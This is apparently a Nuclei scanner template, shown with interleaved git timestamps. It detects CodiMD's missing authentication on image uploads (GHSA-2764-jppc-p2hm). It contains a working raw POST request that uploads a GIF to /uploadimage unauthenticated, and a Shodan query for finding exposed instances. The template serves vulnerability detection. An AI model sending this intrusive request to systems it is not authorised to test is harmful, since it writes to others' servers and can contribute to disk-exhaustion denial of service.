2024-12-30 16:46:29 +05:30
id : codimd-unauth-file-upload
info :
2025-01-08 11:14:12 +05:30
name : CodiMD - File Upload
2024-12-30 16:47:38 +05:30
author : denandz,PulseSecurity.co.nz
2024-12-30 16:46:29 +05:30
severity : medium
description : |
CodiMD does not require valid authentication to access uploaded images or to upload new image data. An attacker who can determine an uploaded image's URL can gain unauthorised access to uploaded image data, or can create a denial of service condition by exhausting all available disk space.
reference :
- https://github.com/hackmdio/codimd/security/advisories/GHSA-2764-jppc-p2hm
- https://pulsesecurity.co.nz/advisories/codimd-missing-image-access-controls
metadata :
2025-05-27 02:29:19 +00:00
max-request : 1
2025-05-27 10:39:47 +08:00
verified : true
2024-12-30 16:47:38 +05:30
shodan-query : html:"CodiMD"
2025-01-08 11:14:12 +05:30
tags : file-upload,intrusive,codimd
2024-12-30 16:46:29 +05:30
http :
- raw :
- |
POST /uploadimage HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------92633278134516118923780781161
-----------------------------92633278134516118923780781161
Content-Disposition : form-data; name="image"; filename="{{randstr}}.gif"
Content-Type : image/gif
{{base64_decode("R0lGODlhAQABAIABAP///wAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==")}}
-----------------------------92633278134516118923780781161 --
matchers-condition : and
matchers :
- type : regex
part : body
regex :
- '"link":".*?.gif"'
2024-12-30 16:47:38 +05:30
- type : status
status :
- 200
2024-12-30 16:46:29 +05:30
extractors :
- type : regex
part : body
group : 1
regex :
2025-01-08 11:14:12 +05:30
- '"link":"(.*)"'
2025-01-08 06:08:23 +00:00
# digest: 4a0a00473045022100ef428961687368873537e6000fdd68686cadc910b6becdbba641b4d26a532d4102202e2b8c020d96ee350519c007eeeceb62b43ca94390f272611b8671b254a05642:922c64590222798bb761d5b6d8e72950
